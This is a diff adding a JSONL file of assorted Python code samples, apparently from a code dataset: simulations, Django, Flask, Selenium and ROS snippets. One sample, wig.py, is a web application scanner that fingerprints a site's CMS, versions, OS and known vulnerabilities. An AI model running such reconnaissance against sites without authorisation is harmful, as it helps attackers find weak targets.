diff --git "a/4343.jsonl" "b/4343.jsonl" new file mode 100644--- /dev/null +++ "b/4343.jsonl" @@ -0,0 +1,691 @@ +{"seq_id":"120383011","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 29 09:57:54 2020\n\n@author: jcantero\n\"\"\"\n\nfrom doors_factory import DoorsFactory\nfrom competitor import Competitor\nfrom presenter import Presenter \nfrom doors_cache import DoorsCache\n\nN = 10000\nwithDoorChange = [True, False]\n\nfor witchChange in withDoorChange:\n countWin = 0\n for i in range (0, N):\n doorsCache = DoorsCache(DoorsFactory.build())\n Competitor.chooseDoor(doorsCache.getDoors())\n Presenter.openDoor(doorsCache.getDoorsWithoutPrizeAndNotSelected())\n\n #print(doorsCache.getDoors())\n if witchChange:\n Competitor.changeDoor(doorsCache.getDoorsNotOpened())\n #print(doorsCache.getDoors())\n\n if (doorsCache.getDoorSelected().havePrize()):\n countWin = countWin +1\n\n print(f\"El numero de aciertos es {countWin} sobre {N} intentos con cambio a {witchChange}\")\n","sub_path":"Tareas/MontyHallProblem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"209479982","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.select import Select\n\noptions = webdriver.ChromeOptions()\noptions.add_extension('c:/chromedriver_win32/extension_6_1_7_0.crx')\ndriver = webdriver.Chrome(executable_path=\"c:\\\\chromedriver_win32\\\\chromedriver.exe\", options=options)\n\n# driver = webdriver.Chrome(chrome_options=options)\n\ndriver.get(\"https://rahulshettyacademy.com/angularpractice/\")\n\n# driver.find_element_by_name(\"name\").send_keys(\"Archana\")\ndriver.find_element_by_css_selector(\"input[name='name']\").send_keys(\"Archana\")\ndriver.find_element_by_name(\"email\").send_keys(\"Kumari\")\n\n# driver.findElementByName().send_keys -send_keys (write in Java)\ndriver.find_element_by_id(\"exampleCheck1\").click()\n\n# select class provide the methods to handle the options in dropdown\ndropdown = Select(driver.find_element_by_id(\"exampleFormControlSelect1\"))\ndropdown.select_by_visible_text(\"Female\")\ndropdown.select_by_index(0)\n# dropdown.select_by_value(\"M\")\n\ndriver.find_element_by_xpath(\"//input[@type='submit']\").click()\n# print(driver.find_element_by_class_name(\"alert-success\").text)\n# //*[contains(@class,'alert-success')] - XPath\n# [class*='alert-success'] - CSS\n# //input[@class='btn btn-success']\nmessage = driver.find_element_by_class_name(\"alert-success\").text\nassert \"success\" in message","sub_path":"PythonSelenium/locators.py","file_name":"locators.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"327608650","text":"#!/usr/bin/env python3\nimport json, pprint, os, time, queue, sys\nimport argparse\nfrom collections import defaultdict, Counter\n\nfrom classes.color import Color\nfrom classes.cache import Cache\nfrom classes.results import Results\nfrom classes.fingerprints import Fingerprints\nfrom classes.discovery import DiscoverTitle, DiscoverIP, DiscoverCookies\nfrom classes.discovery import DiscoverCMS, DiscoverVersion\nfrom classes.discovery import DiscoverOS, DiscoverJavaScript, DiscoverAllCMS\nfrom classes.discovery import DiscoverErrorPage, DiscoverMore\nfrom classes.discovery import DiscoverInteresting, DiscoverUrlLess\nfrom classes.discovery import DiscoverVulnerabilities, DiscoverTools\nfrom classes.headers import ExtractHeaders\nfrom classes.matcher import Match\nfrom classes.printer import Printer\nfrom classes.output import Output\nfrom classes.request2 import Requester, UnknownHostName\n\n\n\n\nclass Wig(object):\n\n\tdef __init__(self, args):\n\n\t\tself.options = {\n\t\t\t'url': args.url,\n\t\t\t'prefix': '',\n\t\t\t'user_agent': args.user_agent,\n\t\t\t'proxy': args.proxy,\n\t\t\t'verbosity': args.verbosity,\n\t\t\t'threads': 10,\n\t\t\t'chunk_size': 10, # same as threads\n\t\t\t'run_all': args.run_all,\n\t\t\t'match_all': args.match_all,\n\t\t\t'stop_after': args.stop_after,\n\t\t\t'no_cache_load': args.no_cache_load,\n\t\t\t'no_cache_save': args.no_cache_save,\n\t\t}\n\n\t\tself.data = {\n\t\t\t'cache': Cache(),\n\t\t\t'results': Results(self.options),\n\t\t\t'fingerprints': Fingerprints(),\n\t\t\t'matcher': Match(),\n\t\t\t'colorizer': Color(),\n\t\t\t'printer': Printer(args.verbosity, Color()),\n\t\t\t'detected_cms': set(),\n\t\t\t'error_pages': set(),\n\t\t\t'queue': queue.Queue(),\n\t\t\t'requested': queue.Queue()\n\t\t}\n\n\t\tself.data['results'].set_printer(self.data['printer'])\n\t\tself.data['requester'] = Requester(self.options, self.data)\n\n\tdef run(self):\n\t\t\n\t\t########################################################################\n\t\t# PRE PROCESSING\n\t\t########################################################################\n\t\t\n\t\ttry:\n\t\t\tis_redirected, new_url = self.data['requester'].detect_redirect()\n\t\texcept UnknownHostName as e:\n\t\t\terror = self.data['colorizer'].format(e, 'red', False)\n\t\t\tprint(error)\n\t\t\tsys.exit(1)\n\n\n\t\tif is_redirected:\n\t\t\thilight_host = self.data['colorizer'].format(new_url, 'red', False)\n\t\t\tchoice = input(\"Redirected to %s. Continue? [Y|n]:\" % (hilight_host,))\n\n\t\t\t# if not, exit\n\t\t\tif choice in ['n', 'N']:\n\t\t\t\tsys.exit(1)\n\t\t\t# else update the host\n\t\t\telse:\n\t\t\t\tself.options['url'] = new_url\n\t\t\t\tself.data['requester'].set_url(new_url)\n\n\t\t# timer started after the user interaction\n\t\tself.data['timer'] = time.time()\n\n\t\t# load cache if this is not disabled\n\t\tself.data['cache'].set_host(self.options['url'])\n\t\tif not self.options['no_cache_load']:\n\t\t\tself.data['cache'].load()\n\n\t\t# find error pages\n\t\tself.data['error_pages'] = DiscoverErrorPage(self.options, self.data).run()\n\n\t\t# create a matcher\n\t\tself.data['matcher'].set_404s(self.data['error_pages'])\n\n\t\tip = DiscoverIP(self.options['url']).run()\n\t\tself.data['results'].set_ip(ip)\n\n\t\t########################################################################\n\t\t# PROCESSING\n\t\t########################################################################\n\t\tcms_finder = DiscoverCMS(self.options, self.data)\n\t\tversion_finder = DiscoverVersion(self.options, self.data)\n\t\tp = self.data['printer']\n\n\t\t# as long as there are more fingerprints to check, and\n\t\t# no cms' have been detected\n\t\tcounter = 0\n\t\tp.print('Running CMS detection...' ,1)\n\t\twhile not cms_finder.is_done() and (len(self.data['detected_cms']) < self.options['stop_after'] or self.options['run_all']):\n\t\t\tcounter += 1\n\n\t\t\t# check the next chunk of urls for cms detection\n\t\t\tcms_list = list(set(cms_finder.run()))\n\t\t\tfor cms in cms_list:\n\t\t\t\t\n\t\t\t\t# skip checking the cms, if it has already been detected\n\t\t\t\tif cms in self.data['detected_cms']: continue\n\n\t\t\t\tp.print('- Running CMS version detection on %s' % (cms, ) ,2)\n\t\t\t\tversion_finder.run(cms)\n\n\t\t\t\t# if a match was found, then it has been added to the results object\n\t\t\t\t# and the detected_cms list should be updated\n\t\t\t\tif self.data['results'].found_match(cms):\n\t\t\t\t\tself.data['detected_cms'].add(cms)\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\t########################################################################\n\t\t# POST PROCESSING\n\t\t########################################################################\n\n\t\t# set site into\n\t\tip = DiscoverIP(self.options['url']).run()\n\t\tself.data['results'].set_ip(ip)\n\t\ttitle = DiscoverTitle(self.options, self.data).run()\n\t\tself.data['results'].set_title(title)\n\n\t\t# find interesting files\n\t\tDiscoverInteresting(self.options, self.data).run()\n\t\tDiscoverMore(self.options, self.data).run()\n\t\tExtractHeaders(self.data).run()\n\t\tDiscoverJavaScript(self.options, self.data).run()\n\t\tDiscoverUrlLess(self.options, self.data).run()\n\t\t\n\t\tif self.options['match_all']:\n\t\t\tDiscoverAllCMS(self.data).run()\n\n\t\tDiscoverOS(self.options, self.data).run()\n\n\t\tcookies = DiscoverCookies(self.data).run()\n\t\tself.data['results'].set_cookies(cookies)\n\n\t\tDiscoverVulnerabilities(self.data).run()\n\n\t\tif not self.options['no_cache_save']:\n\t\t\tself.data['cache'].save()\n\t\n\t\t########################################################################\n\t\t# RESULT PRINTING\n\t\t########################################################################\n\t\tself.data['runtime'] = time.time() - self.data['timer']\n\t\tself.data['url_count'] = self.data['cache'].get_num_urls()\n\n\t\toutputter = Output(self.options, self.data)\n\t\tprint(outputter.get_results())\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description='WebApp Information Gatherer')\n\tparser.add_argument('url', type=str, help='The url to scan e.g. http://example.com')\n\t\n\tparser.add_argument('-n', type=int, default=1, dest=\"stop_after\",\n\t\t\t\t\t\thelp='Stop after this amount of CMSs have been detected. Default: 1')\n\t\n\tparser.add_argument('-a', action='store_true', dest='run_all', default=False,\n\t\t\t\t\t\thelp='Do not stop after the first CMS is detected')\n\n\tparser.add_argument('-m', action='store_true', dest='match_all', default=False,\n\t\t\t\t\t\thelp='Try harder to find a match without making more requests')\n\n\tparser.add_argument('-u', action='store_true', dest='user_agent', \n\t\t\t\t\t\tdefault='Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',\n\t\t\t\t\t\thelp='User-agent to use in the requests')\t\n\n\tparser.add_argument('--no_cache_load', action='store_true', default=False,\n\t\t\t\t\t\thelp='Do not load cached responses')\n\n\tparser.add_argument('--no_cache_save', action='store_true', default=False,\n\t\t\t\t\t\thelp='Do not save the cache for later use')\n\n\tparser.add_argument('-N', action='store_true', dest='no_cache', default=False,\n\t\t\t\t\t\thelp='Shortcut for --no_cache_load and --no_cache_save')\n\n\tparser.add_argument('--verbosity', '-v', action='count', default=0,\n\t\t\t\t\t\thelp='Increase verbosity. Use multiple times for more info')\n\n\tparser.add_argument('--proxy', dest='proxy', default=None, \n\t\t\t\t\t\thelp='Tunnel through a proxy (format: localhost:8080)')\n\n\n\targs = parser.parse_args()\n\n\tif '://' not in args.url:\n\t\targs.url = 'http://' + args.url\n\n\tif args.no_cache:\n\t\targs.no_cache_load = True\n\t\targs.no_cache_save = True\n\n\ttry:\n\t\ttitle = \"\"\"\ndP dP dP dP .88888. \n88 88 88 88 d8' `88 \n88 .8P .8P 88 88 \n88 d8' d8' 88 88 YP88 \n88.d8P8.d8P 88 Y8. .88 \n8888' Y88' dP `88888' \n\n WebApp Information Gatherer\n\"\"\"\n\t\tprint(title)\n\t\twig = Wig(args)\n\t\twig.run()\n\texcept KeyboardInterrupt:\n\t\t# detect ctrl+c\n\t\tfor w in wig.workers:\n\t\t\tw.kill = True\n\t\traise\n","sub_path":"wig.py","file_name":"wig.py","file_ext":"py","file_size_in_byte":7543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"380439969","text":"from django.conf.urls import patterns, url\n\nfrom dog import views\n\n# each url pattern is mapped to a function in dog/views.py\n# and is referenced by dog:(name=) i.e. dogs:index\n# comments preceding a url pattern indicate an example of what the url will appear like\n\nurlpatterns = patterns('',\n #/dog/\n url(r'^$', views.index, name='index'),\n # ex: /dog/5/\n url(r'^(?P\\d+)/$', views.detail, name='detail'),\n # ex: /dog/5/add/\n url(r'^add/$', views.add, name='add'),\n # ex: /dog/5/delete/\n url(r'^(?P\\d+)/delete/$', views.delete, name='delete'),\n # ex: /dog/5/update/\n url(r'^(?P\\d+)/update/$', views.update, name='update'),\n# url(r'^(?P\\d+)/chart/(?P\\d+)/$', views.chart_criteria, name='chart'),\n# url(r'^(?P\\d+)/chart/$', views.chart_base, name='chartbase'),\n # ex: csv/\n url(r'^csv/$', views.export_csv, name='export_csv'),\n # ex: /dog/5/assignskill/\n url(r'^(?P\\d+)/assignskill/$', views.assign_skill, name='assignskill'),\n # ex: /dog/5/assigntrainer/\n url(r'^(?P\\d+)/assigntrainer/$', views.assign_trainer, name='assigntrainer')\n)\n","sub_path":"dog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456013808","text":"\nimport pygame, os, sys, math\n\nfrom queue import PriorityQueue\nfrom lib.actors.hero import Hero\nfrom lib.animations.animation import Animation\nSCREEN_SIZE = (640, 480)\nFPS_CLOCK = pygame.time.Clock()\n\n\nlocal_dir = os.path.dirname(__file__)\n\ndef local_file(path):\n return os.path.join(local_dir, path)\n\ndef load_image(file_name):\n lfile = local_file(file_name)\n print(lfile)\n return pygame.image.load(lfile)\n\nif __name__ == \"__main__\":\n \n \"\"\"\n Actor\n - controller component\n -- AI (finite state machine)\n -- User controller\n \n Actor -> Hero\n Actor -> Enemy\n\n \"\"\"\n\n \"\"\"\n Game Play\n\n - Actions\n -- Use/Item\n -- Attack\n -- Walk\n -- LOS\n -- Toss /Throw\n\n \"\"\"\n\n \"\"\"\n Item System\n\n - Items\n -- consumable\n -- durable/multi-use\n - Weapons\n -- short range\n -- long range (use toss action)\n -- magic??\n - Armor\n --\n\n \"\"\"\n\n \"\"\"\n game loops\n\n -- animation\n -- movement\n -- player controls\n -- attacks\n -- physics\n -- rendering\n\n \"\"\"\n\n pygame.init()\n\n surface = pygame.display.set_mode(SCREEN_SIZE)\n last_millis = 0 \n\n sx = -50 + random.random() * 100\n sy = -50 + random.random() * 100\n entities = []\n hero_animation = Animation(local_file('src/assets/images/cloakandleather.png'), random.randint(0, 1), 2, (sx, sy))\n \n hero = Hero(SCREEN_SIZE[0]/2, SCREEN_SIZE[1]/2, hero_animation)\n\n entities.append(hero)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n delta_time = last_millis / 1000\n\n for entity in entities:\n entity.update(delta_time)\n\n surface.fill((0, 0, 0))\n\n for entity in entities:\n entity.draw(surface)\n\n pygame.display.update()\n\n last_millis = fps_clock.tick(30)","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"154815005","text":"import sys\nimport os\nfrom pathlib import Path\nimport subprocess\n\n# 0_script 1_list_of_files_of_configs 2_location_of_config_files 3_executable_location 4_output_logs_directory\n# SAMPLE: execute_list_of_files.py mkp_testing_list_config_files.txt ./ ./ \nprint (\"Number of arguments: %d\" % len(sys.argv))\nprint (\"Argument List: %s\" % str(sys.argv))\n\nlog_file = open(\"execute.log\", \"w\")\n\n# read through the file and run them \nwith open(sys.argv[1],\"r\") as f:\n for line in f:\n filename, file_extension = os.path.splitext(line)\n\n execution = sys.argv[3] + \" -c \" + sys.argv[2] + line.rstrip() + \" -t \" + sys.argv[4] + filename + \".test_out\" \n print(\"Execution: %s\" % execution)\n\n p = subprocess.call([sys.argv[3], \"-c\", sys.argv[2]+line.rstrip(), \"-t\", sys.argv[4]+filename+\".test_out\"], stdout=log_file, stderr=log_file)\n \nf.close()\nlog_file.close()\n\n","sub_path":"GA_lapagos/SCRIPTS/execute_list_of_files.py","file_name":"execute_list_of_files.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312645033","text":"from flask import Flask\nimport json\nimport re\nimport requests\nimport sys\nimport yaml\n\napp = Flask(__name__)\n__argument__ = None\n\n\n@app.route('/v1/', methods=['GET'])\ndef hello(path):\n if __argument__ == '--help':\n return 'Provide the git repo path'\n else:\n url = __argument__\n regex = r\"https://github.com/([^/].*)/([^/].*)\"\n (user, repo) = re.match(regex, url).groups()\n response = requests.get('https://api.github.com/repos/' + user\n + '/' + repo + '/contents/' + path)\n if response:\n data = json.loads(response.text)\n content = data['content'].decode('base64')\n if '.yml' in data['name']:\n welcome_message = \\\n yaml.load(content).get('welcome_message', None)\n yaml_response = {}\n yaml_response['welcome_message'] = welcome_message\n if welcome_message:\n return yaml.dump(yaml_response)\n else:\n return 'No welcome_message in the config'\n elif '.json' in data['name']:\n welcome_message = \\\n json.loads(content).get('welcome_message', None)\n json_response = {}\n json_response['welcome_message'] = welcome_message\n if welcome_message:\n return json.dumps(json_response, indent=4,\n separators=(',', ': '))\n else:\n return 'No welcome_message in the config'\n else:\n return 'Not supported config format, please use yml or json'\n else:\n\n return 'Error in fetcting from repo:' + response.text\n\nif __name__ == '__main__':\n if len(sys.argv):\n __argument__ = sys.argv[1]\n app.run(debug=True, host='0.0.0.0')\n\n\t\t\t","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484135977","text":"# Homework 4 Solutions\n# Center of Mass Position and Velocity\n# G. Besla\n\n# Homework 6 : modified to take in a different value with which to \n# decrease the volume.\n\n\n# import modules\nimport numpy as np\nimport astropy.units as u\n#from ReadFile import Read -- 24/07/20 Included the content in this file.\n\n# Define a function that reads in the data file\n# USAGE : time, total, data = Read(\"filename\")\ndef Read(filename):\n\n # open the file \n file = open(filename,'r')\n \n #read header info line by line (line will be a string)\n # read first two lines FIRST and store as variable\n \n # read in first line and store time\n line1 = file.readline()\n label, value = line1.split()\n time = float(value)*u.Myr\n\n # read in 2nd line and store total number of particles\n line2 = file.readline()\n label, value = line2.split()\n total = float(value)\n \n # close file\n file.close()\n \n # read the remainder of the file, \n # \"dtype=None\" means line is split using white spaces\n # \"skip_header=3\" skipping the first 3 lines \n # the flag \"names=True\" creates arrays to store the date\n # with the column headers given in line 4 like \"m\", \"x\"\n data = np.genfromtxt(filename,dtype=None,names=True,skip_header=3)\n \n # return the time of the snapshot, \n # total number of particles \n #and an array that stores the remainder of the data. \n return time, total, data\n\n\nclass CenterOfMass:\n \n def __init__(self, filename, ptype):\n # read in the file \n self.time, self.total, self.data = Read(filename)\n #print(self.time)\n \n #create an array to store indexes of particles of desired Ptype\n self.index = np.where(self.data['type'] == ptype)\n \n # store the mass, positions, velocities of only the particles of the given type\n self.m = self.data['m'][self.index]\n self.x = self.data['x'][self.index]\n self.y = self.data['y'][self.index]\n self.z = self.data['z'][self.index]\n self.vx = self.data['vx'][self.index]\n self.vy = self.data['vy'][self.index]\n self.vz = self.data['vz'][self.index]\n\n \n \n def COMdefine(self,a,b,c,m):\n # Function to compute the center of mass position or velocity generically\n # input: array (a,b,c) of positions or velocities and the mass\n # returns: 3 floats (the center of mass coordinates)\n \n # note: since all particles have the same\n # mass when consider only one type\n # the below is equivalently np.sum(x)/len(x)\n\n # xcomponent Center of mass \n Acom = np.sum(a*m)/np.sum(m)\n # ycomponent Center of mass\n Bcom = np.sum(b*m)/np.sum(m)\n # zcomponent\n Ccom = np.sum(c*m)/np.sum(m)\n\n return Acom, Bcom, Ccom\n\n \n def COM_P(self, delta, VolDec):\n # Function to specifically return the center of mass position and velocity\n # input: \n # delta (tolerance)\n # VolDec (value with which to decrease RMAX)\n # returns: One vector, with rows indicating:\n # 3D coordinates of the center of mass position (kpc), \n # 3D velocity vector of the center of mass (km/s)\n\n \n\n # Center of Mass Position\n ###########################\n\n # Try a first guess at the COM position by calling COMdefine\n XCOM, YCOM, ZCOM = self.COMdefine(self.x,self.y,self.z,self.m)\n # compute the magnitude of the COM position vector. \n RCOM = np.sqrt(XCOM**2 + YCOM**2 + ZCOM**2)\n # print('init R', RCOM)\n\n \n # iterative process to determine the center of mass\n \n # change reference frame to COM frame\n # compute the difference between particle coordinates\n # and the first guess at COM position \n xNew = self.x - XCOM\n yNew = self.y - YCOM\n zNew = self.z - ZCOM\n RNEW = np.sqrt(xNew**2.0 + yNew**2.0 +zNew**2.0)\n \n # find the max 3D distance of all particles from the guessed COM\n # will re-start at a reduced radius specified by input VolDec\n RMAX = np.max(RNEW)/VolDec\n\n # pick an initial estimate for the change in COM position \n # between the first guess above and the new one computed from half that volume.\n CHANGE = 1000.0\n \n # start iterative process to determine center of mass position\n # delta is the tolerance for the difference in the old COM and the new one.\n while (CHANGE > delta):\n \n # select all particles within the reduced radius (starting from original x,y,z, m)\n index2 = np.where(RNEW < RMAX)\n x2 = self.x[index2]\n y2 = self.y[index2]\n z2 = self.z[index2]\n m2 = self.m[index2]\n \n # Refined COM position:\n # compute the center of mass position using \n # the particles in the reduced radius\n XCOM2, YCOM2, ZCOM2 = self.COMdefine(x2,y2,z2,m2)\n # compute the new 3D COM position\n RCOM2 = np.sqrt(XCOM2**2 + YCOM2**2 + ZCOM2**2)\n\n # determine the difference between the previous center of mass position \n # and the new one. \n CHANGE = np.abs(RCOM - RCOM2)\n # check this\n # print (\"DIFF\", diff)\n \n # Before loop continues, reset : RMAX, particle separations and COM\n \n # reduce the volume by specified decrement again\n RMAX = RMAX/VolDec\n # check this.\n #print (\"maxR\", maxR)\n \n \n # Change the frame of reference to the newly computed COM.\n # subtract the new COM\n xNew = self.x - XCOM2\n yNew = self.y - YCOM2\n zNew = self.z - ZCOM2\n RNEW = np.sqrt(xNew**2 + yNew**2 + zNew**2)\n \n \n \n # set the center of mass positions to the refined values\n XCOM = XCOM2\n YCOM = YCOM2\n ZCOM = ZCOM2\n RCOM = RCOM2\n \n # create a vector to store the COM position \n # set the correct units usint astropy \n # round all values\n COMP = [np.round((XCOM)*u.kpc), np.round((YCOM)*u.kpc), np.round((ZCOM)*u.kpc)]\n \n # return the COM positon vector\n return COMP\n \n \n def COM_V(self, COMX,COMY,COMZ):\n # Center of Mass velocity\n # input: X, Y, Z positions of the COM\n # returns 3D Vector of COM Velocities\n \n # the max distance from the center that we will use to determine the center of mass velocity \n RVMAX = 15.0*u.kpc\n\n # determine the position of all particles relative to the center of mass position \n xV = self.x[:]*u.kpc - COMX\n yV = self.y[:]*u.kpc - COMY\n zV = self.z[:]*u.kpc - COMZ\n RV = np.sqrt(xV**2 + yV**2 + zV**2)\n \n # determine the index for those particles within the max radius\n indexV = np.where(RV < RVMAX)\n \n # determine the velocity and mass of those particles within the mas radius\n vxnew = self.vx[indexV]\n vynew = self.vy[indexV]\n vznew = self.vz[indexV]\n mnew = self.m[indexV]\n \n # compute the center of mass velocity using those particles\n VXCOM, VYCOM, VZCOM = self.COMdefine(vxnew,vynew,vznew, mnew)\n\n # create a vector to store the COM velocity\n # set the correct units usint astropy \n # round all values\n COMV = [np.round((VXCOM)*u.km/u.s), np.round((VYCOM)*u.km/u.s), np.round((VZCOM)*u.km/u.s)]\n \n # return the COM vector\n return COMV\n \n\n\n","sub_path":"06_EPO/e-TeenAstronomyCafe/04_Galactic_Neighborhood/CenterOfMass.py","file_name":"CenterOfMass.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"215289569","text":"arquivo = open(\"numero.txt\",\"r\")\n\nlista1 = []\nlista2 = []\nlista3 = []\nlista4 = []\n\nfor linha in arquivo.readlines():\n s = linha\n lista1.append(int(s.split(\";\")[0]))\n lista2.append(s.split(\";\")[1])\n lista3.append(s.split(\";\")[2])\n lista4.append(s.split(\";\")[3])\n\narquivo.close()\n\nprint(lista1)\nlista1[0]+=1000\nprint(lista1)","sub_path":"Arquivos.py","file_name":"Arquivos.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456215749","text":"from table import *\nfrom utils import *\n\n\ndef main():\n print(\"-------- Exercise 1 ---------\")\n print(\"- Using the tf-idf approach to summarize an english textual document\")\n print(\"<<< Summary of data/ex1.txt is >>>\")\n directory = 'data/'\n tab = Table(['ex1.txt'], parse_sentences=True, language='english', path=directory)\n with open(directory+'ex1.txt', 'r', encoding='latin1') as file:\n doc = file.read()\n result = summary(doc, tab, 3)\n for sentence in result:\n print(sentence)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"p1_ex1.py","file_name":"p1_ex1.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294188953","text":"# -*- coding: utf-8 -*-\n\n##################\n# SETTINGS SETUP #\n##################\n\nimport StringIO\nimport re\n\nfrom os.path import abspath\nfrom os.path import dirname\nfrom os.path import basename\nfrom os.path import join\n\nfrom fabric.contrib.files import exists\nfrom fabric.api import env\nfrom fabric.api import task\nfrom fabric.api import get\nfrom fabric.api import put\nfrom fabric.api import run\n\nfrom decouple import AutoConfig\nfrom decouple import config\n\nfrom .managers import project\n\n\ndef set_environ(config):\n\n env.ROLE = env.get('env')\n env.roledefs[env.ROLE] = [config('{ROLE}_HOST', 'localhost')]\n\n env.host_string = env.roledefs[env.ROLE][0]\n env.HOME = config('HOME')\n\n env.GIT = config('REPO', '')\n env.BRANCH = config(env.ROLE.upper() + '_BRANCH', '')\n\n env.PROJECT_BASE = abspath(dirname(dirname(__file__)))\n env.PROJECT_NAME = basename(env.PROJECT_BASE)\n env.STATIC_PATH = config('STATIC_PATH', join(env.PROJECT_BASE, 'frontend'))\n\n env.CONFIG_PATH = join(env.PROJECT_BASE, 'config')\n env.ENV_FILE = join(env.CONFIG_PATH, 'env.{ROLE}'.format(**env).lower())\n\n env.VENV_HOME = join(env.HOME, '.virtualenvs')\n env.VENV_PATH = join(env.VENV_HOME, env.PROJECT_NAME)\n\n url = config('DB_URL', '')\n if url:\n url = re.sub('.*://', '', url)\n url = re.sub('@.*/', ':', url)\n env.DB_ROLE = url.split(':')[0]\n env.DB_PWD = url.split(':')[1]\n env.DB_NAME = url.split(':')[2]\n\n\n@task\ndef setup_env():\n with project():\n if not exists('.env'):\n config = AutoConfig()\n run('cp {ENV_FILE} .env'.format(**env))\n set_environ(config)\n\n if env.ROLE != 'local':\n config = AutoConfig()\n env_file = run('cat .env')\n environ_file = run('cat {ENV_FILE}'.format(**env))\n if env_file != environ_file:\n prompt = input(\"\\nFoi identificado uma mudanca no .env\"\n \"\\ndeseja atualizar? (yes/no) \".format(**env))\n\n if prompt.lower() == 'yes':\n env_vars = StringIO()\n get(env.environ_file, local_path=env_vars)\n env_vars.seek(0)\n put(env_vars, '.env')\n set_environ(config)\n\n\nset_environ(config)\nif not exists(join(env.PROJECT_BASE, '.env')):\n setup_env()\n","sub_path":"fabfile/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"61348430","text":"\n# Standard\nimport datetime\nimport logging\n\n# Third Party\nfrom django.core.management.base import BaseCommand\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom dateutil import relativedelta\n\n# Local\nfrom tasks.models import Task, Claim, Nag, Worker, Work\n\n__author__ = 'adrian'\n\nVC_EMAIL = \"Volunteer Coordinator \"\nXIS_EMAIL = \"Xerocraft Internal Systems \"\n\nclass Command(BaseCommand):\n\n help = \"If work MTD doesn't match figure last reported, send worker and email with updated info.\"\n\n @staticmethod\n def send_report(member, work_list, total_dur):\n\n total_hrs = total_dur.total_seconds()/3600.0\n next_month = datetime.date.today() + relativedelta.relativedelta(months=1)\n next_month = next_month.strftime(\"%B\")\n\n text_content_template = get_template('tasks/email_wmtd_template.txt')\n html_content_template = get_template('tasks/email_wmtd_template.html')\n d = Context({\n 'member': member,\n 'work_list': work_list,\n 'total_dur': total_dur,\n 'total_hrs': total_hrs,\n 'next_month': next_month,\n })\n subject = 'Work Trade Report, ' + datetime.date.today().strftime('%a %b %d')\n from_email = VC_EMAIL\n bcc_email = XIS_EMAIL\n to = member.email\n text_content = text_content_template.render(d)\n html_content = html_content_template.render(d)\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to], [bcc_email])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n def handle(self, *args, **options):\n work_lists = {}\n\n logger = logging.getLogger(\"tasks\")\n\n # Process this month's work entries, gathering them by member:\n today = datetime.date.today()\n start_of_month = datetime.datetime(today.year, today.month, 1)\n for work in Work.objects.filter(work_date__gte=start_of_month):\n member = work.claim.claiming_member\n if member not in work_lists: work_lists[member] = []\n work_lists[member] += [work]\n\n # Look for work lists with totals that have changed since last report:\n for member, work_list in work_lists.items():\n\n if not member.worker.should_report_work_mtd: continue\n if member.email == \"\": continue\n\n total_wmtd = datetime.timedelta(0)\n for work in work_list:\n total_wmtd += work.work_duration\n if total_wmtd != member.worker.last_work_mtd_reported:\n logger.info(\"Sent email to %s regarding WMTD = %s\", member, total_wmtd)\n Command.send_report(member, work_list, total_wmtd)\n member.worker.last_work_mtd_reported = total_wmtd\n member.worker.save()\n\n","sub_path":"tasks/management/commands/emailwmtd.py","file_name":"emailwmtd.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"37406729","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nglobal n1_str\nglobal n2_str\ndef callback1(data):\n n1_str=data.data\n print(n1_str, end='')\ndef callback2(data):\n n2_str=data.data\n print(\":\",n2_str)\n\ndef listener():\n\n rospy.init_node('node3', anonymous=True)\n\n rospy.Subscriber('team_abhiyaan', String, callback1)\n rospy.Subscriber('autonomy', String, callback2)\n\nif __name__ == '__main__':\n listener()\n","sub_path":"workspace/src/abhiyaan/scripts/node3.py","file_name":"node3.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645481276","text":"__author__ = 'Ryan'\nimport FBB_League\nfrom Scrape_espn_league import *\nimport pandas as pd\nimport pickle\nimport numpy as np\n\ndef main():\n # NCB = FBB_League.FBB_League('123478', '2015')\n #updateLeague(NCB)\n #NCB = updateLeague(NCB)\n #with 